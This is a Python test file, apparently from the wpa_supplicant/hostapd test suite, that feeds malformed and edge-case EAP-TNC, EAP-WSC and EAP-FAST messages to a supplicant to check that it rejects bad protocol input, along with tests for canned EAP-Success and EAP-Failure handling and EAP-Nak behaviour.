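# 0x80/0x40/0x20 for the L/M/S fragmentation bits (as in EAP-TLS) and
# the low bits for the protocol version (1), so e.g. 0x21 is a
# version 1 start message.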
def test_eap_proto_tnc(dev, apdev):
"""EAP-TNC protocol tests"""
check_eap_capa(dev[0], "TNC")
global eap_proto_tnc_test_done
eap_proto_tnc_test_done = False
def tnc_handler(ctx, req):
logger.info("tnc_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start with unsupported version")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC without Flags field")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_TNC)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Message underflow due to missing Message Length")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0xa1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TNC, 0xa1, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_TNC, 0xe1, 75001)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Start with Message Length")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_TNC, 0xa1, 1)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server used start flag again")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmentation and unexpected payload in ack")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x01)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TNC, 0x01, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server fragmenting and fragment overflow")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TNC, 0xe1, 2, 1)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_TNC, 0x01, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server fragmenting and no message length in a fragment")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TNC, 0x61, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start followed by invalid TNCCS-Batch")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "FOO"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start followed by invalid TNCCS-Batch (2)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "</TNCCS-Batch><TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Batch missing BatchId attribute")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch foo=3></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IF-TNCCS BatchId")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=123456789></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IMC-IMV-Message and TNCC-TNCS-Message end tags")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><IMC-IMV-Message><TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IMC-IMV-Message and TNCC-TNCS-Message Type")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><IMC-IMV-Message></IMC-IMV-Message><TNCC-TNCS-Message></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message XML end tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message Base64 start tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message Base64 end tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><Base64>abc</TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCC-TNCS-Message Base64 message")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><Base64>aGVsbG8=</Base64></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid TNCC-TNCS-Message XML message")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML>hello</XML></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCCS-Recommendation type")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation foo=1></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Recommendation type=none")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation type="none"></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Recommendation type=isolate")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation type="isolate"></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("No more test responses available - test case completed")
global eap_proto_tnc_test_done
eap_proto_tnc_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(tnc_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_tnc_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
frag = 1400
if i == 8:
frag = 150
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TNC", identity="tnc", fragment_size=str(frag),
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD",
"CTRL-EVENT-EAP-STATUS"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
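# A canned EAP-Success immediately after the Identity exchange is
# accepted only when the profile opts in with
# phase1="allow_canned_success=1"; the second connection verifies that
# it is rejected by default.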
def test_eap_canned_success_after_identity(dev, apdev):
"""EAP protocol tests for canned EAP-Success after identity"""
check_eap_capa(dev[0], "MD5")
def eap_canned_success_handler(ctx, req):
logger.info("eap_canned_success_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
return None
srv = start_radius_server(eap_canned_success_handler)
try:
hapd = start_ap(apdev[0])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
phase1="allow_canned_success=1",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=0.1)
if ev is not None:
raise Exception("Unexpected EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
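# EAP-WSC (Wi-Fi Simple Configuration) uses the expanded EAP type with
# WFA Vendor-Id 0x00372a and Vendor-Type 1. The payload starts with an
# Op-Code (1 = WSC_Start, 4 = WSC_MSG, 5 = WSC_Done) and a Flags octet
# (0x01 = more fragments, 0x02 = Message Length field present).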
def test_eap_proto_wsc(dev, apdev):
"""EAP-WSC protocol tests"""
global eap_proto_wsc_test_done, eap_proto_wsc_wait_failure
eap_proto_wsc_test_done = False
def wsc_handler(ctx, req):
logger.info("wsc_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_proto_wsc_wait_failure
eap_proto_wsc_wait_failure = False
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Flags field")
return struct.pack(">BBHB3BLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 1,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Message underflow (missing Message Length field)")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x02)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length (> 50000)")
return struct.pack(">BBHB3BLBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 4,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x02, 65535)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length (< current payload)")
return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 5,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x02, 0, 0xff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Op-Code 5 in WAIT_START state")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
5, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No Message Length field in a fragmented packet")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x01)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first fragmented packet")
return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 5,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x03, 10, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Op-Code 5 in fragment (expected 4)")
return struct.pack(">BBHB3BLBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 3,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
5, 0x01, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first fragmented packet")
return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 5,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x03, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragment overflow")
return struct.pack(">BBHB3BLBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 4,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x01, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Op-Code 5 in WAIT_FRAG_ACK state")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
5, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("No more test responses available - test case completed")
global eap_proto_wsc_test_done
eap_proto_wsc_test_done = True
eap_proto_wsc_wait_failure = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(wsc_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_wsc_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
fragment_size = 1398 if i != 9 else 50
dev[0].connect("eap-test", key_mgmt="WPA-EAP", eap="WSC",
fragment_size=str(fragment_size),
identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="pin=12345670",
scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
if eap_proto_wsc_wait_failure:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_canned_success_before_method(dev, apdev):
"""EAP protocol tests for canned EAP-Success before any method"""
params = int_eap_server_params()
hapd = hostapd.add_ap(apdev[0], params)
bssid = apdev[0]['bssid']
hapd.request("SET ext_eapol_frame_io 1")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
phase1="allow_canned_success=1",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX from hostapd")
res = dev[0].request("EAPOL_RX " + bssid + " 0200000403020004")
if "OK" not in res:
raise Exception("EAPOL_RX to wpa_supplicant failed")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_canned_failure_before_method(dev, apdev):
"""EAP protocol tests for canned EAP-Failure before any method"""
params = int_eap_server_params()
hapd = hostapd.add_ap(apdev[0], params)
bssid = apdev[0]['bssid']
hapd.request("SET ext_eapol_frame_io 1")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
phase1="allow_canned_success=1",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX from hostapd")
res = dev[0].request("EAPOL_RX " + bssid + " 0200000404020004")
if "OK" not in res:
raise Exception("EAPOL_RX to wpa_supplicant failed")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_nak_oom(dev, apdev):
"""EAP-Nak OOM"""
check_eap_capa(dev[0], "MD5")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sm_buildNak"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="sake user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_nak_expanded(dev, apdev):
"""EAP-Nak with expanded method"""
check_eap_capa(dev[0], "MD5")
check_eap_capa(dev[0], "VENDOR-TEST")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="VENDOR-TEST WSC",
identity="sake user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=10)
if ev is None or "NAK" not in ev:
raise Exception("No NAK event seen")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
EAP_TLV_RESULT_TLV = 3
EAP_TLV_NAK_TLV = 4
EAP_TLV_ERROR_CODE_TLV = 5
EAP_TLV_CONNECTION_BINDING_TLV = 6
EAP_TLV_VENDOR_SPECIFIC_TLV = 7
EAP_TLV_URI_TLV = 8
EAP_TLV_EAP_PAYLOAD_TLV = 9
EAP_TLV_INTERMEDIATE_RESULT_TLV = 10
EAP_TLV_PAC_TLV = 11
EAP_TLV_CRYPTO_BINDING_TLV = 12
EAP_TLV_CALLING_STATION_ID_TLV = 13
EAP_TLV_CALLED_STATION_ID_TLV = 14
EAP_TLV_NAS_PORT_TYPE_TLV = 15
EAP_TLV_SERVER_IDENTIFIER_TLV = 16
EAP_TLV_IDENTITY_TYPE_TLV = 17
EAP_TLV_SERVER_TRUSTED_ROOT_TLV = 18
EAP_TLV_REQUEST_ACTION_TLV = 19
EAP_TLV_PKCS7_TLV = 20
EAP_TLV_RESULT_SUCCESS = 1
EAP_TLV_RESULT_FAILURE = 2
EAP_TLV_TYPE_MANDATORY = 0x8000
EAP_TLV_TYPE_MASK = 0x3fff
PAC_TYPE_PAC_KEY = 1
PAC_TYPE_PAC_OPAQUE = 2
PAC_TYPE_CRED_LIFETIME = 3
PAC_TYPE_A_ID = 4
PAC_TYPE_I_ID = 5
PAC_TYPE_A_ID_INFO = 7
PAC_TYPE_PAC_ACKNOWLEDGEMENT = 8
PAC_TYPE_PAC_INFO = 9
PAC_TYPE_PAC_TYPE = 10
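# An EAP-FAST TLV is a 16-bit type (top bit = EAP_TLV_TYPE_MANDATORY, the
# lower bits selected by EAP_TLV_TYPE_MASK) followed by a 16-bit length and
# the value. A minimal builder sketch (the tests below pack their TLVs
# inline with struct.pack instead):
#
# def eap_fast_tlv(tlv_type, value, mandatory=False):
#     if mandatory:
#         tlv_type |= EAP_TLV_TYPE_MANDATORY
#     return struct.pack(">HH", tlv_type, len(value)) + value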
def eap_fast_start(ctx):
logger.info("Send EAP-FAST/Start")
return struct.pack(">BBHBBHH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 16,
EAP_TYPE_FAST, 0x21, 4, 16) + 16*'A'
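# In the Start message above, the flags byte 0x21 combines the Start (S) bit
# (0x20) with EAP-FAST version 1, and the body carries an A-ID TLV
# (type 4, length 16) whose value is the 16 'A' bytes.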
def test_eap_fast_proto(dev, apdev):
"""EAP-FAST Phase protocol testing"""
check_eap_capa(dev[0], "FAST")
global eap_fast_proto_ctx
eap_fast_proto_ctx = None
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_fast_proto_ctx
eap_fast_proto_ctx = ctx
ctx['test_done'] = False
idx += 1
if ctx['num'] == idx:
return eap_fast_start(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("EAP-FAST: TLS processing failed")
data = 'ABCDEFGHIK'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(data),
EAP_TYPE_FAST, 0x01) + data
idx += 1
if ctx['num'] == idx:
ctx['test_done'] = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("Past last test case")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_proto",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Could not start EAP-FAST")
ok = False
for i in range(100):
if eap_fast_proto_ctx:
if eap_fast_proto_ctx['test_done']:
ok = True
break
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
